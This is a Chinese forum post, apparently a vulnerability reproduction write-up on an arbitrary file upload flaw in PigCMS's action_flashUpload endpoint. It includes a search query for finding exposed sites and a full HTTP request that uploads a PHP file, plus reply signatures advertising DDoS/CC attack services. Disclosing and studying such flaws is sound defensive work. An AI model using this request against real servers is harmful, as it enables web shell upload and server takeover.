登录
/
注册
首页
论坛
其它
首页
科技
业界
安全
程序
广播
Follow
关于
导读
排行榜
资讯
发帖说明
登录
/
注册
账号
自动登录
找回密码
密码
登录
立即注册
搜索
搜索
关闭
CSDN热搜
程序园
精品问答
技术交流
资源下载
本版
帖子
用户
软件
问答
教程
代码
写记录
写博客
小组
VIP申请
VIP网盘
网盘
联系我们
发帖说明
道具
勋章
任务
淘帖
动态
分享
留言板
导读
设置
我的收藏
退出
腾讯QQ
微信登录
返回列表
首页
›
资源区
›
程序
›
PigCMS action_flashUpload 任意文件上传漏洞
漏洞分析
PigCMS action_flashUpload 任意文件上传漏洞
[ 复制链接 ]
anyue1937
2025-10-15 20:07:52
程序园永久vip申请,500美金$,无限下载程序园所有程序/软件/数据/等
## 漏洞描述
PigCMS action_flashUpload 方法中存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件获取到服务器权限
## 漏洞影响
pigcms
## 网络测绘
```app.name="PigCMS"```
## 漏洞复现
登陆页面

验证POC
```POST /cms/manage/admin.php?m=manage&c=background&a=action_flashUpload HTTP/1.1Host:Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=----aaa
------aaaContent-Disposition: form-data; name="filePath"; filename="test.php"Content-Type: video/x-flv
<?php phpinfo();?>------aaa```

```/cms/upload/images/2025/08/11/1691722887xXbx.php```
渗透
漏洞
getshell
相关帖子
CmsEasy crossall_act.php SQL注入漏洞
Dc-3靶机渗透
DC-4靶机渗透
AI辅助渗透测试小试牛刀
漏洞解析--文件包含漏洞(含漏洞复现)
wepoc Nuclei 漏洞扫描器图形界面工具
MySQL8总被扫出漏洞,不想升级该怎么办呢?看我如何应对的
Strix:用AI做渗透测试,把安全漏洞扼杀在开发阶段
DC-01靶场渗透
pgAdmin 后台命令执行漏洞复现及分析(CVE-2025-2945)
回复
使用道具
举报
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
照妖镜
相关推荐
程序
CmsEasy crossall_act.php SQL注入漏洞
7
166
anyue1937
2025-10-15
业界
Dc-3靶机渗透
1
637
骂治并
2025-10-17
科技
DC-4靶机渗透
1
60
缢闸
2025-10-26
科技
AI辅助渗透测试小试牛刀
0
118
尚腱埂
2025-10-29
业界
漏洞解析--文件包含漏洞(含漏洞复现)
8
649
能杜孱
2025-11-05
安全
wepoc Nuclei 漏洞扫描器图形界面工具
5
1051
痕厄
2025-11-06
业界
MySQL8总被扫出漏洞,不想升级该怎么办呢?看我如何应对的
1
310
倡遍竽
2025-11-07
业界
Strix:用AI做渗透测试,把安全漏洞扼杀在开发阶段
2
515
叟澡帅
2025-11-12
安全
DC-01靶场渗透
2
925
姨番单
2025-11-23
安全
pgAdmin 后台命令执行漏洞复现及分析(CVE-2025-2945)
0
242
赘暨逢
2025-12-17
回复
(2)
映各
2025-10-31 03:02:59
回复
使用道具
举报
照妖镜
猛犸象科技工作室:
网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
感谢分享,学习下。
喳谍
2025-11-25 20:37:34
回复
使用道具
举报
照妖镜
猛犸象科技工作室:
网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
懂技术并乐意极积无私分享的人越来越少。珍惜
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
回复
本版积分规则
回帖并转播
回帖后跳转到最后一页
浏览过的版块
安全
签约作者
程序园优秀签约作者
发帖
anyue1937
2025-11-25 20:37:34
关注
0
粉丝关注
3
主题发布
板块介绍填写区域,请于后台编辑
财富榜{圆}
3934307807
991124
anyue1937
9994892
kk14977
6845357
4
xiangqian
638210
5
韶又彤
9997
6
宋子
9982
7
闰咄阅
9993
8
刎唇
9993
9
俞瑛瑶
9998
10
蓬森莉
9950
查看更多
今日好文热榜
995
阿里Z-Image图像生成模型容器部署
306
痞子衡嵌入式:16MB以上NOR Flash地址模式
661
最新AI换脸软件,全面升级可直播,Mirage下
447
热点 Key 与大 Key 治理——识别、拆分、预
645
Media Extended
322
vlookup的终结者splookup,9个案例讲透查询
850
ROS2之Launch介绍
886
精选 8 个 .NET 开发实用的类库,效率提升
82
精选 8 个 .NET 开发实用的类库,效率提升
573
精选 8 个 .NET 开发实用的类库,效率提升
143
精选 8 个 .NET 开发实用的类库,效率提升
114
精选 8 个 .NET 开发实用的类库,效率提升
609
alist如何将默认布局设置为图片布局
1011
Kali2025.4+Cherry Studio一键配置HexStrik
419
PHP 之高级面向对象编程 深入理解设计模式
416
PHP 之高级面向对象编程 深入理解设计模式
572
升级curl版本,及升级后引起的动态库链接不
297
2025年GEO优化服务商全景对比:五大核心维
779
AI Agent详解
983
Buildah 简明教程:让镜像构建更轻量,告别